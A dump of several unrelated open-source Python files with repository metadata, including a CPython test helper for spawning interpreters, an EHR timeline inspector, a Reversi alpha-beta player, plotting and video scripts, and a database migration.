] | 11,058 | 2018-05-29T07:40:06.000Z | 2022-03-31T11:38:42.000Z | Lib/test/support/script_helper.py | outkine/RustPython | e25443221c7852407a60eb38b0ba3c1c4e617d8f | [
"CC-BY-4.0",
"MIT"
] | 2,105 | 2018-06-01T10:07:16.000Z | 2022-03-31T14:56:42.000Z | Lib/test/support/script_helper.py | outkine/RustPython | e25443221c7852407a60eb38b0ba3c1c4e617d8f | [
"CC-BY-4.0",
"MIT"
] | 914 | 2018-07-27T09:36:14.000Z | 2022-03-31T19:56:34.000Z | # Common utility functions used by various script execution tests
# e.g. test_cmd_line, test_cmd_line_script and test_runpy
import collections
import importlib
import sys
import os
import os.path
import subprocess
import py_compile
import zipfile
from importlib.util import source_from_cache
from test.support import make_legacy_pyc, strip_python_stderr
# Cached result of the expensive test performed in the function below.
__cached_interp_requires_environment = None


def interpreter_requires_environment():
    """
    Returns True if our sys.executable interpreter requires environment
    variables in order to be able to run at all.

    This is designed to be used with @unittest.skipIf() to annotate tests
    that need to use an assert_python*() function to launch an isolated
    mode (-I) or no environment mode (-E) sub-interpreter process.

    A normal build & test does not run into this situation but it can happen
    when trying to run the standard library test suite from an interpreter that
    doesn't have an obvious home with Python's current home finding logic.

    Setting PYTHONHOME is one way to get most of the testsuite to run in that
    situation. PYTHONPATH or PYTHONUSERSITE are other common environment
    variables that might impact whether or not the interpreter can start.
    """
    global __cached_interp_requires_environment
    if __cached_interp_requires_environment is None:
        if 'PYTHONHOME' in os.environ:
            # PYTHONHOME is set: assume the interpreter depends on it.
            __cached_interp_requires_environment = True
        else:
            # Probe: can a sub-interpreter start with -E (env ignored)?
            try:
                subprocess.check_call(
                    [sys.executable, '-E', '-c', 'import os, sys; sys.exit(0)'])
            except subprocess.CalledProcessError:
                __cached_interp_requires_environment = True
            else:
                __cached_interp_requires_environment = False

    return __cached_interp_requires_environment
class _PythonRunResult(collections.namedtuple("_PythonRunResult",
                                              ("rc", "out", "err"))):
    """Helper for reporting Python subprocess run results"""

    @staticmethod
    def _clip(stream, label):
        # Keep only the last 80*100 characters of a stream, prepending a
        # marker when anything was dropped, then render it as ASCII text.
        limit = 80 * 100
        if len(stream) > limit:
            stream = b'(... truncated ' + label + b' ...)' + stream[-limit:]
        return stream.decode('ascii', 'replace').rstrip()

    def fail(self, cmd_line):
        """Raise AssertionError with helpful details about the failed run."""
        stdout_text = self._clip(self.out, b'stdout')
        stderr_text = self._clip(self.err, b'stderr')
        message = ("Process return code is %d\n"
                   "command line: %r\n"
                   "\n"
                   "stdout:\n"
                   "---\n"
                   "%s\n"
                   "---\n"
                   "\n"
                   "stderr:\n"
                   "---\n"
                   "%s\n"
                   "---"
                   % (self.rc, cmd_line, stdout_text, stderr_text))
        raise AssertionError(message)
# Executing the interpreter in a subprocess
def run_python_until_end(*args, **env_vars):
    """Run sys.executable with *args* in a subprocess until it exits.

    Keyword arguments become environment variables for the child, except
    for the double-underscore control keys:
      __cwd      -- working directory for the child process
      __isolated -- explicitly enable/disable the -I (isolated mode) flag
      __cleanenv -- start from an (almost) empty environment

    Returns a (_PythonRunResult, cmd_line) pair; the result's stderr has
    already been filtered through strip_python_stderr().
    """
    env_required = interpreter_requires_environment()
    cwd = env_vars.pop('__cwd', None)
    if '__isolated' in env_vars:
        isolated = env_vars.pop('__isolated')
    else:
        # Default to isolated mode only when no env vars were requested
        # and the interpreter can start without its environment.
        isolated = not env_vars and not env_required
    cmd_line = [sys.executable, '-X', 'faulthandler']
    if isolated:
        # isolated mode: ignore Python environment variables, ignore user
        # site-packages, and don't add the current directory to sys.path
        cmd_line.append('-I')
    elif not env_vars and not env_required:
        # ignore Python environment variables
        cmd_line.append('-E')
    # But a special flag that can be set to override -- in this case, the
    # caller is responsible to pass the full environment.
    if env_vars.pop('__cleanenv', None):
        env = {}
        if sys.platform == 'win32':
            # Windows requires at least the SYSTEMROOT environment variable to
            # start Python.
            env['SYSTEMROOT'] = os.environ['SYSTEMROOT']

        # Other interesting environment variables, not copied currently:
        # COMSPEC, HOME, PATH, TEMP, TMPDIR, TMP.
    else:
        # Need to preserve the original environment, for in-place testing of
        # shared library builds.
        env = os.environ.copy()

    # set TERM='' unless the TERM environment variable is passed explicitly
    # see issues #11390 and #18300
    if 'TERM' not in env_vars:
        env['TERM'] = ''

    env.update(env_vars)
    cmd_line.extend(args)
    proc = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            env=env, cwd=cwd)
    with proc:
        try:
            out, err = proc.communicate()
        finally:
            # Ensure the child never outlives this call.
            proc.kill()
            # NOTE(review): subprocess._cleanup() is a private CPython API
            # and may not exist on every interpreter/version -- confirm.
            subprocess._cleanup()
    rc = proc.returncode
    err = strip_python_stderr(err)
    return _PythonRunResult(rc, out, err), cmd_line
def _assert_python(expected_success, /, *args, **env_vars):
    """Run the interpreter and fail loudly when the outcome is unexpected."""
    res, cmd_line = run_python_until_end(*args, **env_vars)
    # The run misbehaved exactly when its actual success (rc == 0) disagrees
    # with the caller's expectation.
    succeeded = not res.rc
    if succeeded != bool(expected_success):
        res.fail(cmd_line)
    return res
def assert_python_ok(*args, **env_vars):
    """Run the interpreter with `args`/`env_vars` and require success.

    Returns the (return code, stdout, stderr) result triple; an
    AssertionError is raised when the subprocess exits nonzero.  When the
    __cleanenv keyword is set, env_vars is used as a fresh environment.
    Python is started in isolated mode (command line option -I) unless the
    __isolated keyword is set to False.
    """
    return _assert_python(True, *args, **env_vars)
def assert_python_failure(*args, **env_vars):
    """Run the interpreter with `args`/`env_vars` and require failure.

    Returns the (return code, stdout, stderr) result triple; an
    AssertionError is raised when the subprocess exits with rc == 0.
    See assert_python_ok() for the supported dunder keywords.
    """
    return _assert_python(False, *args, **env_vars)
def spawn_python(*args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kw):
    """Run a Python subprocess with the given arguments.

    kw is extra keyword args to pass to subprocess.Popen. Returns a Popen
    object.  By default the child's stderr is merged into its stdout pipe.
    """
    cmd_line = [sys.executable]
    # -E (ignore PYTHON* env vars) only when the interpreter can start
    # without its environment; otherwise the child would fail to boot.
    if not interpreter_requires_environment():
        cmd_line.append('-E')
    cmd_line.extend(args)
    # Under Fedora (?), GNU readline can output junk on stderr when initialized,
    # depending on the TERM setting.  Setting TERM=vt100 is supposed to disable
    # that.  References:
    # - http://reinout.vanrees.org/weblog/2009/08/14/readline-invisible-character-hack.html
    # - http://stackoverflow.com/questions/15760712/python-readline-module-prints-escape-character-during-import
    # - http://lists.gnu.org/archive/html/bug-readline/2007-08/msg00004.html
    env = kw.setdefault('env', dict(os.environ))
    env['TERM'] = 'vt100'
    return subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
                            stdout=stdout, stderr=stderr,
                            **kw)
def kill_python(p):
    """Run the given Popen process until completion and return stdout.

    Closes the child's stdin (signalling EOF), drains and closes stdout,
    then waits for the process so no zombie is left behind (this matters
    when running with regrtest -R, which would otherwise report a leak).
    """
    p.stdin.close()
    data = p.stdout.read()
    p.stdout.close()
    # try to cleanup the child so we don't appear to leak when running
    # with regrtest -R.
    p.wait()
    # subprocess._cleanup() is a private helper that was removed in
    # Python 3.9; call it only where it still exists.
    cleanup = getattr(subprocess, '_cleanup', None)
    if cleanup is not None:
        cleanup()
    return data
def make_script(script_dir, script_basename, source, omit_suffix=False):
    """Write `source` to a new script in `script_dir` and return its path."""
    suffix = '' if omit_suffix else os.extsep + 'py'
    script_name = os.path.join(script_dir, script_basename + suffix)
    # Scripts are always written as UTF-8, the default source encoding.
    with open(script_name, 'w', encoding='utf-8') as script_file:
        script_file.write(source)
    # Drop stale import-system caches so the fresh file is importable.
    importlib.invalidate_caches()
    return script_name
def make_zip_script(zip_dir, zip_basename, script_name, name_in_zip=None):
    """Archive `script_name` into a new zip file.

    Returns a (zip path, path of the script inside the zip) pair.  When no
    explicit archive name is given and the script lives in a __pycache__
    directory, it is first converted to a legacy-layout .pyc file.
    """
    zip_name = os.path.join(zip_dir, zip_basename + os.extsep + 'zip')
    if name_in_zip is None:
        parts = script_name.split(os.sep)
        if len(parts) >= 2 and parts[-2] == '__pycache__':
            # Cached bytecode: archive the legacy .pyc instead.
            legacy_pyc = make_legacy_pyc(source_from_cache(script_name))
            script_name = legacy_pyc
            name_in_zip = os.path.basename(legacy_pyc)
        else:
            name_in_zip = os.path.basename(script_name)
    with zipfile.ZipFile(zip_name, 'w') as zip_file:
        zip_file.write(script_name, name_in_zip)
    return zip_name, os.path.join(zip_name, name_in_zip)
def make_pkg(pkg_dir, init_source=''):
    """Create directory `pkg_dir` as a package with an __init__.py inside."""
    os.mkdir(pkg_dir)
    make_script(pkg_dir, '__init__', init_source)
def make_zip_pkg(zip_dir, zip_basename, pkg_name, script_basename,
                 source, depth=1, compiled=False):
    """Build a zip archive containing a (possibly nested) package.

    The package `pkg_name` is nested `depth` times, with `script_basename`
    placed at the innermost level.  When `compiled` is true, .pyc files are
    archived instead of .py sources.  The temporary on-disk files are
    removed after zipping.  Returns (zip path, path of the script inside
    the zip).
    """
    unlink = []
    init_name = make_script(zip_dir, '__init__', '')
    unlink.append(init_name)
    init_basename = os.path.basename(init_name)
    script_name = make_script(zip_dir, script_basename, source)
    unlink.append(script_name)
    if compiled:
        # Replace the source files with their compiled bytecode equivalents.
        init_name = py_compile.compile(init_name, doraise=True)
        script_name = py_compile.compile(script_name, doraise=True)
        unlink.extend((init_name, script_name))
    # pkg_names = ['pkg', 'pkg/pkg', ...] down to the requested depth.
    pkg_names = [os.sep.join([pkg_name]*i) for i in range(1, depth+1)]
    script_name_in_zip = os.path.join(pkg_names[-1], os.path.basename(script_name))
    zip_filename = zip_basename+os.extsep+'zip'
    zip_name = os.path.join(zip_dir, zip_filename)
    with zipfile.ZipFile(zip_name, 'w') as zip_file:
        # Every nesting level gets its own copy of the same __init__ file.
        for name in pkg_names:
            init_name_in_zip = os.path.join(name, init_basename)
            zip_file.write(init_name, init_name_in_zip)
        zip_file.write(script_name, script_name_in_zip)
    for name in unlink:
        os.unlink(name)
    #if test.support.verbose:
    #    with zipfile.ZipFile(zip_name, 'r') as zip_file:
    #        print 'Contents of %r:' % zip_name
    #        zip_file.printdir()
    return zip_name, os.path.join(zip_name, script_name_in_zip)
| 40.253788 | 112 | 0.642138 |
ace084074f67a693d4f15d32de06f9b01be85697 | 96 | py | Python | venv/lib/python3.8/site-packages/rope/base/prefs.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/rope/base/prefs.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/rope/base/prefs.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/b2/d8/c1/6743c2ad1bdbba8b59270d7bebcac581445361c5e818e34f4972e93aae | 96 | 96 | 0.895833 |
ace0852691c45029d65a36086298c74cbe085f2e | 2,488 | py | Python | ehr_ml/timeline.py | desmarg/ehr_ml | 48a385fe2ebdbef655bd4c6b6dd9a73a4e3f76b4 | [
"MIT"
] | 1 | 2021-05-19T13:08:29.000Z | 2021-05-19T13:08:29.000Z | ehr_ml/timeline.py | desmarg/ehr_ml | 48a385fe2ebdbef655bd4c6b6dd9a73a4e3f76b4 | [
"MIT"
] | null | null | null | ehr_ml/timeline.py | desmarg/ehr_ml | 48a385fe2ebdbef655bd4c6b6dd9a73a4e3f76b4 | [
"MIT"
] | null | null | null | from __future__ import annotations
import argparse
import bisect
import os
from .extension.timeline import (
ObservationWithValue,
TimelineReader,
Patient,
PatientDay,
)
__all__ = ["ObservationWithValue", "TimelineReader", "Patient", "PatientDay"]
def inspect_timelines() -> None:
    """CLI entry point: print the full timeline of one patient.

    Reads `extract.db` from the given extraction directory and prints, for
    each day of the selected patient, the date, age, plain observations and
    observations-with-values (codes resolved through the extract's
    dictionaries).
    """
    parser = argparse.ArgumentParser(
        description="A tool for inspecting an ehr_ml extract"
    )
    parser.add_argument(
        "extract_dir",
        type=str,
        help="Path of the folder to the ehr_ml extraction",
    )
    parser.add_argument(
        "patient_id", type=int, help="The patient id to inspect",
    )
    args = parser.parse_args()
    source_file = os.path.join(args.extract_dir, "extract.db")
    timelines = TimelineReader(source_file)
    # NOTE(review): patient_id is a required positional argument, so the
    # else branch below is unreachable in practice.
    if args.patient_id is not None:
        patient_id = int(args.patient_id)
    else:
        patient_id = timelines.get_patient_ids()[0]
    # Binary search assumes get_patient_ids() returns a sorted sequence —
    # TODO confirm against TimelineReader's contract.
    location = bisect.bisect_left(timelines.get_patient_ids(), patient_id)
    original_patient_id = timelines.get_original_patient_ids()[location]
    if timelines.get_patient_ids()[location] != patient_id:
        print("Could not locate patient ?", patient_id)
        exit(-1)
    patient = timelines.get_patient(patient_id)
    print(f"Patient: {patient.patient_id}, (aka {original_patient_id})")
    def obs_with_value_to_str(obs_with_value: ObservationWithValue) -> str:
        # Render as code-"text" for textual values, code-number otherwise.
        code_text = timelines.get_dictionary().get_word(obs_with_value.code)
        if obs_with_value.is_text:
            value_text = timelines.get_value_dictionary().get_word(
                obs_with_value.text_value
            )
            return f'{code_text}-"{value_text}"'
        else:
            return f"{code_text}-{obs_with_value.numeric_value}"
    for i, day in enumerate(patient.days):
        print(f"----Day {i}----")
        print(day.date)
        print(day.age)
        # Set-style rendering of the day's plain observation codes.
        print(
            "{"
            + ", ".join(
                sorted(
                    [
                        str(timelines.get_dictionary().get_word(a))
                        for a in day.observations
                    ]
                )
            )
            + "}"
        )
        # Same for observations that carry a numeric or text value.
        print(
            "{"
            + ", ".join(
                sorted(
                    [
                        obs_with_value_to_str(a)
                        for a in day.observations_with_values
                    ]
                )
            )
            + "}"
        )
| 27.644444 | 77 | 0.564711 |
ace0868e43437288d5ff578a8b1bff48fdea75b2 | 5,707 | py | Python | AlphaBetaPlayer.py | sglyon/reversi.py | d66f37364e7b6cba1f6c1c08401b6ca9373ecc42 | [
"MIT"
] | null | null | null | AlphaBetaPlayer.py | sglyon/reversi.py | d66f37364e7b6cba1f6c1c08401b6ca9373ecc42 | [
"MIT"
] | null | null | null | AlphaBetaPlayer.py | sglyon/reversi.py | d66f37364e7b6cba1f6c1c08401b6ca9373ecc42 | [
"MIT"
] | 1 | 2020-01-01T00:12:04.000Z | 2020-01-01T00:12:04.000Z | from Player import Player
import sys
import time
import random
from pprint import pprint
from board import Board
INF = 1.0e100
CORNERS = [(0, 0), (0, 7), (7, 0), (7, 7)]
CENTERS = [(3, 3), (3, 4), (4, 3), (4, 4)]
DANGERS = [(0, 1), (0, 6), (1, 0), (1, 1), (1, 6), (1, 7), (6, 0), (6, 1),
(6, 6), (6, 7), (7, 1), (7, 6)]
G_EDGES = [(0, 2), (0, 3), (0, 4), (0, 5), (2, 0), (3, 0), (4, 0), (5, 0),
(2, 7), (3, 7), (4, 7), (5, 7), (7, 2), (7, 3), (7, 4), (7, 5)]
NEIGHBORS = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0),
(1, 1)]
def print_futures(futures):
    """Debug helper: print each (value, move) pair as 'move :  value'."""
    for value, move in futures:
        print(move, ": ", value)
# Python 2/3 compatibility shims: a lazy `range` and a uniform way to
# iterate over dict items.
if sys.version_info.major == 2:
    range = xrange
    def iteritems_dict(x):
        # Lazy item iteration on Python 2.
        return x.iteritems()
else:
    def iteritems_dict(x):
        # items() already returns a lazy view on Python 3.
        return x.items()
def get_value(future):
    """Key function: return the evaluation score of a (value, move) pair."""
    return future[0]
def printState(s):
    """Pretty-print a board state with rows reversed (row 0 at the bottom)."""
    # INVERTS TO MATCH VISUAL
    pprint(s[::-1])
def compare(a, b):
    """Three-way comparison: -1 if a < b, 0 if equal, 1 if a > b."""
    return int(a > b) - int(a < b)
class AlphaBetaPlayer(Player):
    """Reversi player choosing moves by time-limited alpha-beta minimax.

    Leaf positions are scored in evaluate() by a weighted sum of the
    normalized piece differential, corner and danger-square occupancy,
    own mobility and the opponent's mobility ("frontiers").
    """

    def __init__(self, me, you, fprune=0.1, margin=0.0):
        super(AlphaBetaPlayer, self).__init__(me, you)

        # algorithm params
        self.margin = margin  # widens alpha/beta cutoffs for more aggressive pruning
        self.fprune = fprune  # probability for unlikely random pruning (currently unused)

        # Heuristic weights consumed by evaluate().
        self.overall_weight = 1.0
        self.corner_weight = 4.0
        self.g_weight = 2.0
        self.danger_weight = 2.0
        self.center_weight = 1.0
        self.move_weight = 1.1
        self.connected_weight = 1.5
        self.mobility_weight = 2.0
        self.frontiers_weight = 5.0

        self.modify_weights_at_round = 30  # round after which weights are retuned
        self.seconds_cutoff = 9            # per-move wall-clock budget (seconds)
        self.max_depth = 4                 # search depth limit
        self.t1, self.t2 = 0.0, 0.0
        self.round = -1
        # BUGFIX: this was previously assigned to self.timeLimit, a name that
        # nothing reads.  stop() compares against self.time_limit, which was
        # only set in move() — initialize the name actually used so stop()
        # can never hit an undefined attribute.
        self.time_limit = time.time()

    def move(self, state):
        """Return the move to play for `state` (random during the opening)."""
        moves = self.get_valid_moves(state)
        self.time_limit = time.time() + self.seconds_cutoff
        if self.round < 4:
            return random.choice(moves)
        if self.round > self.modify_weights_at_round:
            # Late game: favor raw piece count and search one ply deeper.
            self.overall_weight = 2.0
            self.mobility_weight = 1.0
            self.max_depth = 5
        return self.alpha_beta(moves)

    def alpha_beta(self, moves):
        """Pick the move whose resulting position has the best minimax value."""
        def future(move):
            space = self.board.spaces[move]
            next_s = self.board.next_state_bits(space, self.mine, self.foe)
            return self.min_val(next_s, -INF, INF, depth=0)

        futures = [(future(move), move) for move in moves]
        print_futures(futures)
        best_value_move = max(futures, key=get_value)
        print("Best: ", best_value_move[1], ": ", best_value_move[0])
        return best_value_move[1]

    def stop(self, depth):
        """True when the search must stop (depth or wall-clock budget hit)."""
        if depth > self.max_depth:
            return True
        elif time.time() > self.time_limit:
            print("-" * depth, "Timeout")
            return True
        else:
            return False

    def min_val(self, s, alpha, beta, depth):
        """Minimizing step: the opponent picks the worst outcome for us."""
        if self.stop(depth):
            return self.evaluate(s, self.me)
        val = INF
        moves = self.get_valid_moves(s, self.you)
        for idx, move in enumerate(moves):
            # next_state_bits(self, space, mover, opponent):
            space = self.board.spaces[move]
            next_s = self.board.next_state_bits(space, s[1], s[0])
            val = min(val, self.max_val(next_s, alpha, beta, depth+1))
            if val - self.margin <= alpha:  # or fprune > random():
                return val
            beta = min(beta, val)
        return val

    def max_val(self, s, alpha, beta, depth):
        """Maximizing step: we pick the best outcome for us."""
        if self.stop(depth):
            return self.evaluate(s, self.me)
        val = -INF
        moves = self.get_valid_moves(s, self.me)
        for idx, move in enumerate(moves):
            space = self.board.spaces[move]
            next_s = self.board.next_state_bits(space, s[0], s[1])
            val = max(val, self.min_val(next_s, alpha, beta, depth+1))
            if val + self.margin >= beta:
                return val
            alpha = max(alpha, val)
        return val

    def enemy_index(self, player):
        """Map player index 1 -> 2 and 2 -> 1."""
        return (player == 1) + 1

    def evaluate(self, s, player):
        """Heuristic score of bitboard state `s` from `player`'s viewpoint."""
        enemy = self.enemy_index(player)

        # How many moves do I have vs how many moves they have.
        player_moves = self.get_valid_moves(s, player)
        enemy_moves = self.get_valid_moves(s, enemy)
        mobility = len(player_moves)
        frontiers = len(enemy_moves)

        # Normalized piece differential.
        my_score = self.board.score(s[0])
        foe_score = self.board.score(s[1])
        overall = (my_score - foe_score) / (my_score + foe_score)

        corners_bits = sum(self.board.spaces[i] for i in CORNERS)
        corners = (self.board.score(corners_bits & s[0]) -
                   self.board.score(corners_bits & s[1]))

        dangers_bits = sum(self.board.spaces[i] for i in DANGERS)
        dangers = (self.board.score(dangers_bits & s[0]) -
                   self.board.score(dangers_bits & s[1]))

        return (self.overall_weight * overall +
                self.corner_weight * corners +
                self.danger_weight * dangers +
                self.mobility_weight * mobility -
                self.frontiers_weight * frontiers)
ace087f37fe526c4ab33191a7e02dc4b3467409d | 1,653 | py | Python | python/lib/charting.py | aiver-workshop/intro-algo | f45f9f7873d94b76ff4edb3663c16ce45253922c | [
"MIT"
] | null | null | null | python/lib/charting.py | aiver-workshop/intro-algo | f45f9f7873d94b76ff4edb3663c16ce45253922c | [
"MIT"
] | null | null | null | python/lib/charting.py | aiver-workshop/intro-algo | f45f9f7873d94b76ff4edb3663c16ce45253922c | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from numpy import ndarray
import numpy as np
# use ggplot style for more sophisticated visuals
plt.style.use('ggplot')
def live_plotter(x_vec: ndarray, y1_data: ndarray, line1, title='', pause_time=0.01):
    """Update (or lazily create) a live-updating matplotlib line plot.

    Pass a falsy `line1` (e.g. []) on the first call to create the figure;
    subsequent calls must pass the returned line object back in so only its
    y-data is updated.  Returns the Line2D handle.

    Reference: https://makersportal.com/blog/2018/8/14/real-time-graphing-in-python
    """
    if not line1:
        # this is the call to matplotlib that allows dynamic plotting
        plt.ion()
        fig = plt.figure(figsize=(13, 6))
        ax = fig.add_subplot(111)
        # create a variable for the line so we can later update it
        line1, = ax.plot(x_vec, y1_data, '-o', alpha=0.8)
        # update plot label/title
        plt.ylabel('Y Label')
        plt.title('Title: {}'.format(title))
        plt.show()
    # after the figure, axis, and line are created, we only need to update the y-data
    line1.set_ydata(y1_data)
    # adjust limits if new data goes beyond bounds
    if np.min(y1_data) <= line1.axes.get_ylim()[0] or np.max(y1_data) >= line1.axes.get_ylim()[1]:
        plt.ylim([np.min(y1_data) - np.std(y1_data), np.max(y1_data) + np.std(y1_data)])
    # this pauses the data so the figure/axis can catch up - the amount of pause can be altered above
    plt.pause(pause_time)
    # return line so we can update it again in the next iteration
    return line1
if __name__ == '__main__':
    # Demo loop: shift random samples into a fixed-size window and redraw
    # the live plot forever (terminate with Ctrl-C / window close).
    size = 100
    x_vec = np.linspace(0, 1, size + 1)[0:-1]
    y_vec = np.random.randn(len(x_vec))
    line1 = []
    while True:
        rand_val = np.random.randn(1)
        y_vec[-1] = rand_val
        line1 = live_plotter(x_vec, y_vec, line1)
        # Drop the oldest sample and append a placeholder for the next one.
        y_vec = np.append(y_vec[1:], 0.0)
ace0897966007e4fa0e597f712bb47f45fd1b3b8 | 2,163 | py | Python | opencv/play_video.py | CospanDesign/python | 9f911509aae7abd9237c14a4635294c7719c9129 | [
"MIT"
] | 5 | 2015-12-12T20:16:45.000Z | 2020-02-21T19:50:31.000Z | opencv/play_video.py | CospanDesign/python | 9f911509aae7abd9237c14a4635294c7719c9129 | [
"MIT"
] | null | null | null | opencv/play_video.py | CospanDesign/python | 9f911509aae7abd9237c14a4635294c7719c9129 | [
"MIT"
] | 2 | 2020-06-01T06:27:06.000Z | 2022-03-10T13:21:03.000Z | #! /usr/bin/env python
# Copyright (c) 2017 Dave McCoy (dave.mccoy@cospandesign.com)
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
import cv2
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
DEFAULT_PATH="/home/cospan/sandbox/output.mp4"
def play_video(path):
    """Play the video at `path` in an OpenCV window until EOF or 'q'.

    Bug fix: the original loop contained a duplicated waitKey check and a
    cap.release() *inside* the loop, which released the capture after the
    first frame; it also never checked cap.read()'s success flag, so
    imshow() would be fed None at end-of-stream.
    """
    cap = cv2.VideoCapture(path)
    while True:
        ret, frame = cap.read()
        if not ret:
            # End of stream (or read failure): stop playback cleanly.
            break
        cv2.imshow('frame', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    cap.release()
    cv2.destroyAllWindows()
def main(argv):
    """Parse command-line arguments and play the selected video file.

    argv: full argument vector (argv[0] is the program name, as passed
    from the __main__ guard).
    """
    #Parse out the commandline arguments
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=DESCRIPTION,
        epilog=EPILOG
    )
    parser.add_argument("-p", "--path",
                        nargs=1,
                        default=[DEFAULT_PATH],
                        help="Path of the video file to play")
    parser.add_argument("-d", "--debug",
                        action="store_true",
                        help="Enable Debug Messages")

    # Bug fix: parse_args() previously read sys.argv and silently ignored
    # the argv parameter; honor the caller-supplied vector instead.
    args = parser.parse_args(argv[1:])
    # Python 2 'print' statements converted to the function form, which is
    # valid in both Python 2 and 3 for these single-argument calls.
    print("Running Script: %s" % NAME)
    path = args.path[0]
    if args.debug:
        print("path: %s" % path)

    play_video(path)
main(sys.argv)
| 25.151163 | 85 | 0.617661 |
ace08a5ad0b53fe250cf5e5b89607ce79ea63f6a | 1,236 | py | Python | glance/db/sqlalchemy/migrate_repo/versions/020_drop_images_table_location.py | cloudbau/glance | 616b097c052f5bf59b05326ed1d2d1ae1c703dc9 | [
"Apache-2.0"
] | 1 | 2018-05-03T03:52:39.000Z | 2018-05-03T03:52:39.000Z | glance/db/sqlalchemy/migrate_repo/versions/020_drop_images_table_location.py | cloudbau/glance | 616b097c052f5bf59b05326ed1d2d1ae1c703dc9 | [
"Apache-2.0"
] | null | null | null | glance/db/sqlalchemy/migrate_repo/versions/020_drop_images_table_location.py | cloudbau/glance | 616b097c052f5bf59b05326ed1d2d1ae1c703dc9 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy
from glance.db.sqlalchemy.migrate_repo import schema
def get_images_table(meta):
    """Reflect and return the existing 'images' table bound to `meta`."""
    return sqlalchemy.Table('images', meta, autoload=True)
def upgrade(migrate_engine):
    """Migration 020: drop the legacy 'location' column from images."""
    metadata = sqlalchemy.schema.MetaData(migrate_engine)
    images = get_images_table(metadata)
    images.columns['location'].drop()
def downgrade(migrate_engine):
    """Revert migration 020: re-create the 'location' text column."""
    metadata = sqlalchemy.schema.MetaData(migrate_engine)
    images = get_images_table(metadata)
    location_column = sqlalchemy.Column('location', schema.Text())
    location_column.create(images)
| 32.526316 | 78 | 0.747573 |
ace08a9c7371c5623eaf2aab3e04ba3fe7707470 | 758 | py | Python | tests/test_slice_render.py | yk-szk/volume-renderer | 68b2a0a57cb5530164062ecbe21fe9c33fcf286c | [
"MIT"
] | 37 | 2020-02-09T12:42:02.000Z | 2022-02-03T02:34:13.000Z | tests/test_slice_render.py | yk-szk/volume-renderer | 68b2a0a57cb5530164062ecbe21fe9c33fcf286c | [
"MIT"
] | null | null | null | tests/test_slice_render.py | yk-szk/volume-renderer | 68b2a0a57cb5530164062ecbe21fe9c33fcf286c | [
"MIT"
] | 9 | 2020-05-22T08:27:49.000Z | 2022-02-03T02:33:56.000Z | from pyvr.renderer import Renderer
from pyvr.actors import VolumeActor
from pyvr.actors import SliceActor
from pyvr.data.volume import load_volume
from pyvr.utils.video import write_video
if __name__ == '__main__':
    # Render a rotating volume with three orthogonal slice planes and save
    # the 360-frame turntable animation as an mp4.
    volume_file = 'original-image.mhd'
    volume = load_volume(volume_file)
    # Intensity window for the slice planes (HU range, presumably CT —
    # TODO confirm against the input data).
    clim = (-150, 350)

    renderer = Renderer()
    renderer.set_camera(pos=(0,-1200,0))
    renderer.add_actor(VolumeActor(volume, 'bone'))
    # One slice plane per axis, all sharing the same intensity window.
    renderer.add_actor(SliceActor(volume, normal=(1,0,0), clim=clim))
    renderer.add_actor(SliceActor(volume, normal=(0,1,0), clim=clim))
    renderer.add_actor(SliceActor(volume, normal=(0,0,1), clim=clim))
    proj = renderer.render(rotate_angles=list(range(0,360,1)), bg=(1,1,1))
    write_video(proj, 'test.mp4')
| 32.956522 | 74 | 0.721636 |
ace08bb629f86922bca12abd1bdb37ae2046ee61 | 6,570 | py | Python | tensorflow/python/data/experimental/service/server_lib_test.py | vixadd/tensorflow | 8c624204eb686a91779149dc500e6c8c60096074 | [
"Apache-2.0"
] | 3 | 2019-11-19T14:07:27.000Z | 2020-10-04T12:57:40.000Z | tensorflow/python/data/experimental/service/server_lib_test.py | vixadd/tensorflow | 8c624204eb686a91779149dc500e6c8c60096074 | [
"Apache-2.0"
] | 4 | 2020-04-09T16:22:20.000Z | 2021-12-15T13:57:36.000Z | tensorflow/python/data/experimental/service/server_lib_test.py | vixadd/tensorflow | 8c624204eb686a91779149dc500e6c8c60096074 | [
"Apache-2.0"
] | 4 | 2022-01-13T11:23:44.000Z | 2022-03-02T11:11:42.000Z | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
